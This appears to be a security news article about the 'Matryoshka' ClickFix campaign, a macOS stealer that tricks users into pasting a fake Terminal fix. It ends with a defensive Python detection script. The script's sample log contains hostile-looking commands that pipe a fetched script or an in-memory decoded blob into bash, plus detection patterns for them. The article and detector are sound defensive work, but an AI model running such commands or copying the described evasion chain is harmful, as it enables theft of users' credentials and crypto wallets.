A sophisticated social engineering campaign targeting macOS users has surfaced that uses an advanced ClickFix technique to deploy a dangerous stealer. The variant, called "Matryoshka" after the Russian nesting dolls, hides its malicious code from automated analysis tools and security scanners behind nested layers of obfuscation. The attack sidesteps the conventional download-and-launch security expectations that many users rely on by tricking victims into running Terminal commands that look like genuine software fixes.

The campaign specifically targets visitors to software review sites, using typosquatted domains to catch users who mistype the address of a legitimate website.

Victims who land on the fraudulent domain are shown a fake installation prompt instructing them to enter a "fix" command in the macOS Terminal application. Intego analysts identified this attack chain after noticing typosquatted domains such as comparisions[.]org, which imitates the legitimate comparisons.org website by adding an extra letter.

Unlike earlier ClickFix variants that used readable scripts, Matryoshka uses sophisticated evasion techniques intended to make detection harder. Instead of writing clean script files to disk, the malicious payload unpacks only in memory, remaining encoded and compressed until the moment it executes. This makes basic static analysis harder for researchers and drastically reduces visibility for file-based security scanning.

Following successful execution, the loader retrieves an AppleScript payload built specifically to target cryptocurrency wallet apps such as Trezor Suite and Ledger Live and to harvest browser credentials. The malware first attempts programmatic credential theft before falling back to fake system dialogs that keep prompting for passwords until victims supply them.

Mechanism of Infection and Evasion Strategies

Each step in the Matryoshka infection chain is designed to avoid detection while preserving operational effectiveness.

When victims paste the malicious Terminal command, it retrieves a shell script carrying a large encoded payload hidden inside a heredoc. That payload is decoded and decompressed through an in-memory pipeline without producing observable file artifacts.

The loader exhibits several evasion behaviors that help it run unnoticed. It detaches its main routine into the background and exits quickly, so the Terminal prompt returns almost immediately and victims believe the process has finished. The script also redirects standard input, output, and error streams to suppress visible artifacts in the terminal session.

Additionally, the command-and-control infrastructure requires specific custom headers on requests and answers automated scanners that lack them with generic errors. Users should never paste commands from websites into Terminal; legitimate software updates do not require this. Organizations should block typosquatting domains, monitor Terminal-initiated execution patterns, and watch for suspicious staging archives or tampering with wallet applications.
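To make "monitor Terminal-initiated execution patterns" concrete, the following is an added detection example written for this article; it is not code from Intego, from the campaign, or from any vendor product. It scores process-start events for the traits described above (a pasted command that fetches a script and pipes it into a shell, a heredoc carrying an encoded blob that is decoded and decompressed in memory, a job backgrounded with its streams sent to /dev/null, and a follow-on osascript stage) and correlates the scores per Terminal session by walking parent-process links. The JSON-lines schema (pid, ppid, process, cmdline) is a hypothetical export format standing in for whatever EDR or Endpoint Security telemetry you have, the sample events are constructed rather than real, and the indicator weights and thresholds are assumptions to tune locally.

```python
"""Added example: heuristic scoring of Terminal-rooted process chains for
ClickFix-style traits. Schema, sample events, weights and thresholds are
constructed assumptions, not vendor values or real telemetry."""
import json
import re
from collections import defaultdict
from typing import Dict, List, Optional, Tuple

# (indicator name, weight, pattern). Weights are assumptions.
INDICATORS = [
    ("web_fetch_piped_to_shell", 3, re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba|z)?sh\b")),
    ("heredoc_blob", 2, re.compile(r"<<-?\s*['\"]?\w+")),
    ("base64_decode", 2, re.compile(r"\bbase64\b[^|;]*\s(-d|-D|--decode)\b")),
    ("decompress_in_pipeline", 1, re.compile(r"\|\s*(gunzip|zcat|gzip\s+-d|xz\s+-d)\b")),
    ("stdio_to_devnull", 1, re.compile(r"[<>]\s*/dev/null")),
    ("backgrounded", 1, re.compile(r"(?<!&)&\s*[\"']?\s*$")),
    ("osascript_stage", 2, re.compile(r"\bosascript\b")),
]
TERMINAL_BONUS = 1        # assumption: extra weight when the chain starts in a terminal app
ALERT_THRESHOLD = 4       # assumption: per-event alert level
SESSION_THRESHOLD = 6     # assumption: per-terminal-session alert level
TERMINAL_APPS = {"Terminal", "iTerm2"}

# Constructed sample events in the hypothetical JSON-lines schema.
SAMPLE_LOG = r"""
{"pid": 100, "ppid": 1, "process": "Terminal", "cmdline": "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal"}
{"pid": 101, "ppid": 100, "process": "zsh", "cmdline": "-zsh"}
{"pid": 102, "ppid": 101, "process": "git", "cmdline": "git pull --rebase origin main"}
{"pid": 103, "ppid": 101, "process": "bash", "cmdline": "bash -c \"cat <<'EOF' > notes.txt\""}
{"pid": 104, "ppid": 101, "process": "bash", "cmdline": "bash -c \"curl -fsSL https://example.invalid/fix | bash\""}
{"pid": 105, "ppid": 104, "process": "bash", "cmdline": "bash -c \"base64 -d <<'EOF' | gunzip | bash >/dev/null 2>&1 &\""}
{"pid": 106, "ppid": 105, "process": "osascript", "cmdline": "osascript /tmp/stage.scpt"}
"""


def terminal_root(pid: int, parents: Dict[int, int], names: Dict[int, str]) -> Optional[int]:
    """Walk ppid links upward; return the pid of the terminal app owning this chain, if any."""
    seen = set()
    while pid in parents and pid not in seen:
        seen.add(pid)
        if names.get(pid) in TERMINAL_APPS:
            return pid
        pid = parents[pid]
    return None


def score_event(event: dict, terminal_rooted: bool) -> Tuple[int, List[str]]:
    """Return (score, matched indicator names) for one process-start event."""
    cmd = event.get("cmdline", "")
    hits = [name for name, _, rx in INDICATORS if rx.search(cmd)]
    score = sum(w for name, w, _ in INDICATORS if name in hits)
    if terminal_rooted and hits:          # only weight the terminal origin when something else fired
        score += TERMINAL_BONUS
        hits.append("terminal_session")
    return score, hits


def analyze(lines: List[str]) -> dict:
    """Score every event and aggregate scores per Terminal session root."""
    events = [json.loads(line) for line in lines if line.strip()]
    parents = {e["pid"]: e["ppid"] for e in events}
    names = {e["pid"]: e["process"] for e in events}
    per_event, per_session = {}, defaultdict(int)
    for e in events:
        root = terminal_root(e["pid"], parents, names)
        score, hits = score_event(e, root is not None)
        per_event[e["pid"]] = {"score": score, "hits": hits, "alert": score >= ALERT_THRESHOLD}
        if root is not None:
            per_session[root] += score
    sessions = {r: {"score": s, "alert": s >= SESSION_THRESHOLD} for r, s in per_session.items()}
    return {"events": per_event, "sessions": sessions}


if __name__ == "__main__":
    report = analyze(SAMPLE_LOG.splitlines())
    for pid, verdict in report["events"].items():
        flag = "ALERT" if verdict["alert"] else "     "
        print(f"{flag} pid={pid} score={verdict['score']} hits={verdict['hits']}")
    for root, verdict in report["sessions"].items():
        print(f"session rooted at pid {root}: total={verdict['score']} alert={verdict['alert']}")
```

The per-session total matters more than any single event: a benign heredoc (`cat <<'EOF'`) or a lone osascript launch from a terminal scores below the per-event threshold on its own, while the fetch-and-pipe command, the in-memory decode stage and the osascript stage together push the session well past it. Tune the weights against your own baseline of developer activity before alerting on them.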
